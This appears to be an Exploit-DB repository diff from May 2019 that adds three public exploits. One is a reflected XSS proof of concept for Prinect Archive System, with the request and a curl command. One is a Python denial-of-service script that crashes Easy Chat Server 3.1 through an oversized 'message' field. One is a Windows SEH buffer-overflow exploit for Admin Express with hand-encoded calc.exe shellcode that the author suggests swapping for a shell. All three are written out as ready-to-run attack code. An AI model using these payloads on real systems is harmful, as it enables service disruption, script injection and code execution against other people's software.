DB: 2019-05-08

3 changes to exploits/shellcodes

Easy Chat Server 3.1 - 'message' Denial of Service (PoC)

Admin Express 1.2.5.485 - 'Folder Path' Local SEH Alphanumeric Encoded Buffer Overflow

Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting

exploits/multiple/webapps/46804.txt

@@ -0,0 +1,98 @@
+Details
+================
+Software: Prinect Archive System 
+Version: v2015 Release 2.6 
+Homepage: https://www.heidelberg.com
+Advisory report: https://github.com/alt3kx/CVE-2019-10685
+CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10685
+CVSS: 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+CWE-79
+
+Description
+================
+A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Print Archive System v2015 release 2.6
+
+Vulnerability
+================
+The user supplied input containing JavaScript is echoed back in JavaScript code in an HTML response via the "TextField" parameter.
+
+Proof of concept
+================
+
+Reflected XSS
+Payload: %3cscript%3ealert(1)%3c%2fscript%3e
+
+The offending GET request is: 
+
+GET /am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2 HTTP/1.1
+Host: victim_IP:8090
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
+Connection: close
+Cookie: JSESSIONID=C665EA9A7594E736D39C93EA8763A01F
+
+Reflected XSS Reponse: 
+
+HTTP/1.1 200 OK
+Server: Apache-Coyote/1.1
+Content-Type: text/html;charset=UTF-8
+Date: Mon, 04 Feb 2019 13:15:12 GMT
+Connection: close
+
+[../snip]
+
+id="msgContainer">Authentication failed for: <script>alert(1)</script> <br/>Click Help button for more information about login permissions.</div>
+
+# curl -i -s -k -X GET
+
+-H "Host: victim:8090" 
+-H "Accept-Encoding: gzip, deflate" 
+-H "Accept: */*" 
+-H "Accept-Language: en-US,en-GB;q=0.9,en;q=0.8" 
+-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 
+-H "Connection: close" 
+-H "Cookie: JSESSIONID=C665EA9A7594E736D39C93EA8763A01F" 
+-b "JSESSIONID=C665EA9A7594E736D39C93EA8763A01F" 
+"http://victim:8090/am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2" 
+--proxy http://127.0.0.1:8080
+
+Final payload into URL:
+ 
+http://victim_IP:8090/am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2
+
+Mitigations
+================
+No more feedback from the vendor:
+https://www.heidelberg.com
+
+Disclosure policy
+================
+We believes in responsible disclosure.
+Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report. 
+
+This vulnerability will be published if we do not receive a response to this report with 10 days.
+
+Timeline
+================
+
+2019-02-04: Discovered
+2019-02-25: Retest PRO environment
+2019-03-25: Retest on researcher's ecosystem
+2019-04-02: Vendor notification
+2019-04-03: Vendor feedback received
+2019-04-08: Reminder sent
+2019-04-08: 2nd reminder sent 
+2019-04-11: Internal communication
+2019-04-26: No more feedback received from the vendor
+2019-05-30: New issues found
+2019-06-30: Public Disclosure
+
+Discovered by:
+Alex Hernandez aka alt3kx:
+================
+Please visit https://github.com/alt3kx for more information.
+
+My current exploit list @exploit-db: 
+https://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576

exploits/windows/dos/46806.py

@@ -0,0 +1,65 @@
+#!/usr/bin/python
+#---------------------------------------------------------
+# Title: Easy Chat Server Version 3.1 - (DOS)
+# Date: 2019-05-07
+# Author: Miguel Mendez Z
+# Team: www.exploiting.cl
+# Vendor: http://www.echatserver.com
+# Software Link: http://www.echatserver.com/ecssetup.exe
+# Platforms: Windows
+# Version: 3.1
+# Tested on: Windows Windows 7_x86/7_x64 [eng]
+#---------------------------------------------------------
+#
+# 1- Primer socket con (GET) generamos una sesion valida para luego hacer el paso 2.
+# 2- Segundo enviamos (POST) la data en la variable message para crashear la aplicacion.
+
+import os, sys, socket
+from time import sleep
+
+ip = '127.0.0.1'
+padding = 'A' * 8000
+
+GET = (
+"GET /chat.ghp?username=1&password=&room=1&sex=1 HTTP/1.1\r\n"
+"User-Agent: Mozilla/4.0\r\n"
+"Host: "+str(ip)+":80\r\n"
+"Accept-Language: en-us\r\n"
+"Accept-Encoding: gzip, deflate\r\n"
+"Referer: http://"+str(ip)+"\r\n"
+"Connection: Keep-Alive\r\n\r\n"
+)
+
+try:
+  print "\n [*] Ejecutando payload GET (Creando Sesion) - length " + str(len(GET))
+  s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+  s1.connect((ip, 80))
+  s1.send(GET)
+  s1.recv(1024)
+  s1.close()
+except:
+  print "Sin conexion GET"
+
+sleep(3)
+
+POST = (
+"POST /body2.ghp?username=1&password=&room=1 HTTP/1.1\r\n"
+"Host: "+str(ip)+"\r\n"
+"User-Agent: Mozilla/4.0\r\n"
+"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+"Accept-Language: es-CL,en-US;q=0.5\r\n"
+"Accept-Encoding: gzip, deflate\r\n"
+"Referer: http://"+str(ip)+"/chatsubmit.ghp?username=1&password=&room=1\r\n"
+"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
+"staticname=%3A000539&tnewname=&msayinfo=1&mnewname=&mtowho=All&mfilters=0&mfont=0&mfcolor=1&elist=&seltype=Theme&msg=&Submit=Send&sc=on&notifysound=on&message="+str(padding)+"&chat_flag="
+)
+
+try:
+  print " [*] Ejecutando payload POST (Crashing) - length " + str(len(POST))
+  s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+  s2.connect((ip, 80))
+  s2.send(POST)
+  s2.recv(1024)
+  s2.close()
+except:
+  print "Sin conexion POST"

exploits/windows/local/46805.py

@@ -0,0 +1,116 @@
+# Title: Admin Express v1.2.5.485 Folder Path Local SEH Alphanumeric Encoded Buffer Overflow
+# Date: May 6th, 2019
+# Author: Connor McGarr (https://connormcgarr.github.io)
+# Vendor Homepage: https://admin-express.en.softonic.com/
+# Software Link: https://admin-express.en.softonic.com/download
+# Version v1.2.5.485
+# Tested on: Windows XP SP3 EN
+
+# TO RUN:
+# 1. Run python script
+# 2. Copy contents of pwn.txt
+# 3. Open AdminExpress
+# 4. Select System Compare
+# 5. Paste contents into Folder Path on the left hand side
+# 6. Press the scale icon in the middle of the screen, under the Services and Running Processes tabs
+
+
+# This got a bit hairy. We manually encoded our shellcode, and we had to use the sub method for each encode.
+# 05 was a bad char for us, which was an add eax opcode. We could use (in hex) 1-4,6,10-7E and this was an odd character set.
+
+# calc.exe shellcode:
+# "\x31\xc9\x51\x68"
+# "\x63\x61\x6c\x63"
+# "\x54\xB8\xc7\x93"
+# "\xc2\x77\xff\xd0"
+# Can replace with a shell, if you are willing to do the encoding and decoding math :-) Too preoccupied for now, so here is a calc.exe
+
+# For zeroing out registers before manual shellcode
+zero = "\x25\x01\x01\x01\x01"           # and eax, 0x01010101
+zero += "\x25\x10\x10\x10\x10"          # and eax, 0x10101010
+
+# For restoring stack pointer before execution of shellcode, due to
+# old stack pointer value needed. This puts 0x0012DC98 into ECX, to be used later
+restore = "\x54"		# push esp; (pushing the current value of ESP, which needs to be restored later, onto the stack)
+restore += "\x59"		# pop ecx; (holding the value of old ESP in ECX, to be called later.)
+restore += "\x51"		# push ecx; (to get the value on the stack for the mov esp command later)
+
+# Stack alignment
+# Need to make ESP 0x012F3F4. Using sub method to write that value onto the stack.
+# AFter making ESP 0x012F3F4, it should be the same value as EAX- so we can write up the stack.
+alignment = "\x54"			# push esp
+alignment += "\x58"			# pop eax; (puts the value of ESP into EAX)
+
+# Write these 3 sub values in normal format, since memory address, not instruction to be executed.
+# 364D5555 364D5555 364E5555
+alignment += "\x2d\x38\x4d\x55\x55"	# sub eax, 0x384D5555
+alignment += "\x2d\x36\x4d\x55\x55"	# sub eax, 0x364D5555
+alignment += "\x2d\x36\x4e\x55\x55"	# sub eax, 0x364E5555
+alignment += "\x50"			# push eax
+alignment += "\x5c"			# pop esp; (puts the value of eax back into esp)
+
+# calc.exe shellcode, via the sub method. Values needed are as followed. Reference the calc.exe shellcode line for line numbers.
+# 1st line = 2C552D14 01562D14 01562E16
+shellcode = zero
+shellcode += "\x2d\x14\x2d\x55\x2c"	# sub eax, 0x2C552D14
+shellcode += "\x2d\x14\x2d\x55\x01"	# sub eax, 0x01562D14
+shellcode += "\x2d\x16\x2e\x56\x01"	# sub eax, 0x01562E16
+shellcode += "\x50"			# push eax; (get the value on the stack). We will do this for all remaining steps like this one.
+
+# 2nd line = 24121729 24121739 2414194A
+shellcode += zero
+shellcode += "\x2d\x29\x17\x12\x24"	# sub eax, 0x24121729
+shellcode += "\x2d\x39\x17\x12\x24"     # sub eax, 0x24121739
+shellcode += "\x2d\x4a\x19\x14\x24"     # sub eax, 0x2414194A (was 40 at the end, but a miscalc happened. Changed to 4A)
+shellcode += "\x50"			# push eax
+
+# 3rd line = 34313635 34313434 34313434
+shellcode += zero
+shellcode += "\x2d\x35\x36\x31\x34"	# sub eax, 0x34313635
+shellcode += "\x2d\x34\x34\x31\x34"	# sub eax, 0x34313434
+shellcode += "\x2d\x34\x34\x31\x34"	# sub eax, 0x34313434
+shellcode += "\x50"			# push eax
+
+# 4th line = 323A1245 323A1245 333A1245
+shellcode += zero
+shellcode += "\x2d\x45\x12\x3a\x32"	# sub eax, 0x323A1245
+shellcode += "\x2d\x45\x12\x3a\x32"	# sub eax, 0x323A1245
+shellcode += "\x2d\x45\x12\x3a\x33"	# sub eax, 0x333A1245
+shellcode += "\x50"			# push eax
+
+# We need to restore the old ESP value of 0x0012DC98 to spawn calc.exe. Since it is a syscall,
+# We need the ESP value before execution. We will do this by performing MOV ECX, ESP (remember ECX contains old ESP!)
+# Here are the 3 values: 3F3F2711 3F3F2711 3F3F2811
+# For some reason the application changed some of my math. 3F3F2811 was supposed to be
+# 403F3F2811 and so I changed it by 1 hex byte to get the CC (was getting CD)
+move = zero
+move += "\x2d\x40\x3f\x27\x11"		# sub eax, 0x3F3F2711
+move += "\x2d\x3f\x3f\x27\x11"		# sub eax, 0x3F3F2711
+move += "\x2d\x3f\x3f\x28\x11"		# sub eax, 0x3F3F2811
+move += "\x50"				# push eax
+
+# All together now.
+payload = "\x41" * 4260
+payload += "\x70\x7e\x71\x7e"		# JO 126 hex bytes. If jump fails, default to JNO 126 hex bytes
+payload += "\x42\x4c\x01\x10"		# 0x10014c42 pop pop ret wmiwrap.DLL
+
+# There are 2 NULL (\x00) terminators in our buffer of A's, near our nSEH jump. We are going to jump far away from them
+# so we have enough room for our shellcode and to decode.
+payload += "\x41" * 122			# add padding since we jumped 7e (126 bytes) above
+payload += "\x70\x7e\x71\x7e"		# JO or JNO another 126 bytes, so shellcode can decode
+payload += "\x41" * 124
+payload += "\x70\x7e\x71\x7e"		# JO or JNO another 126 bytes, so shellcode can decode
+payload += "\x41" * 124
+payload += "\x70\x79\x71\x79"		# JO or JNO only 121 bytes
+payload += "\x41" * 121			# NOP is in the restricted chars. Using \x41 as a slide into alignment
+payload += restore
+payload += alignment
+payload += shellcode
+payload += move
+payload += "\x43" * (5000-len(payload))
+
+print payload
+
+f = open('pwn.txt', 'w')
+f.write(payload)
+f.close()

files_exploits.csv

@@ -6409,6 +6409,7 @@ id,file,description,date,author,type,platform,port
 46781,exploits/linux/dos/46781.txt,"Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification",2019-04-30,"Google Security Research",dos,linux,
 46793,exploits/windows/dos/46793.txt,"SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service",2019-05-03,"Dino Barlattani",dos,windows,
 46803,exploits/ios/dos/46803.c,"iOS 12.1.3 - 'cfprefsd' Memory Corruption",2019-05-06,ZecOps,dos,ios,
+46806,exploits/windows/dos/46806.py,"Easy Chat Server 3.1 - 'message' Denial of Service (PoC)",2019-05-07,"Miguel Mendez Z",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10453,6 +10454,7 @@ id,file,description,date,author,type,platform,port
 46756,exploits/windows/local/46756.rb,"RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)",2019-04-25,Metasploit,local,windows,
 46779,exploits/windows/local/46779.py,"DeviceViewer 3.12.0.1 - 'user' SEH Overflow",2019-04-30,"Hayden Wright",local,windows,
 46802,exploits/windows/local/46802.txt,"NSClient++ 0.5.2.35 - Privilege Escalation",2019-05-06,bzyo,local,windows,
+46805,exploits/windows/local/46805.py,"Admin Express 1.2.5.485 - 'Folder Path' Local SEH Alphanumeric Encoded Buffer Overflow",2019-05-07,"Connor McGarr",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41231,3 +41233,4 @@ id,file,description,date,author,type,platform,port
 46796,exploits/multiple/webapps/46796.txt,"ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution",2019-05-06,"Gilson Camelo",webapps,multiple,
 46798,exploits/php/webapps/46798.txt,"PHPads 2.0 - 'click.php3?bannerID' SQL Injection",2019-05-06,"felipe andrian",webapps,php,80
 46799,exploits/asp/webapps/46799.txt,"microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection",2019-05-06,"felipe andrian",webapps,asp,80
+46804,exploits/multiple/webapps/46804.txt,"Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting",2019-05-07,alt3kx,webapps,multiple,80